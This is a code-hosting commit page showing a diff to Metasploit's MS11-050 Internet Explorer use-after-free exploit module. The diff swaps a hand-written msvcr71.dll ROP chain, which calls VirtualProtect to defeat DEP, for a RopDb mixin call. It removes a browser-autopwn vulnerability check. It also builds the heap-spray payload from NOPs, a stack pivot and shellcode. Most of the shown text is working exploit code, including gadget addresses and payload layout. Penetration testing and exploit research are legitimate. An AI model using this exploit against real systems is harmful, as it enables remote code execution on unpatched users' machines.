dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'ms11_050_ropdb_update' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ms11_050_ropdb_update

This commit is contained in:
jvazquez-r7 2012-10-06 14:10:36 +02:00
parent 260d85cfb1 94d5eb7a8c
commit 874fe64343
1 changed files with 12 additions and 48 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
# If it's IE 8, then we need .net to bypass ASLR
:vuln_test => %Q|
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
}
|,
:os_name => OperatingSystems::WINDOWS
})
def initialize(info={})
@ -46,30 +37,29 @@ class Metasploit3 < Msf::Exploit::Remote
to bypass DEP (Data Execution Prevention).
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'd0c_s4vage', #Discovery, poc
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
'bannedit', #Windows 7
'bannedit' #Windows 7
],
'References' =>
[
['CVE', '2011-1260'],
['OSVDB', '72950'],
['MSB', 'MS11-050'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
@ -185,42 +175,16 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
#In case we're using ROP, initialize it now
code = ''
if mytarget['Rop']
# !mona -m msvcr71 rop
code = [
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c354901, # POP EBX # RETN [msvcr71.dll]
0xffffffff,
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c364802, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].pack("V*")
p = make_nops(44) #Nops
p << "\xeb\x04\xff\xff" #Jmp over the pivot
p << [mytarget.ret].pack('V') #Stack pivot
p << payload.encoded
code << "\x90"*20 #Nops
code << "\xeb\x04\xff\xff" #Jmp over the pivot
code << [mytarget.ret].pack('V') #Stack pivot
rop_payload = generate_rop_payload('java', p)
end
code << payload.encoded
code = (rop_payload) ? rop_payload : payload.encoded
# fill the vtable
vtable = [mytarget['TargetAddr']].pack('V*')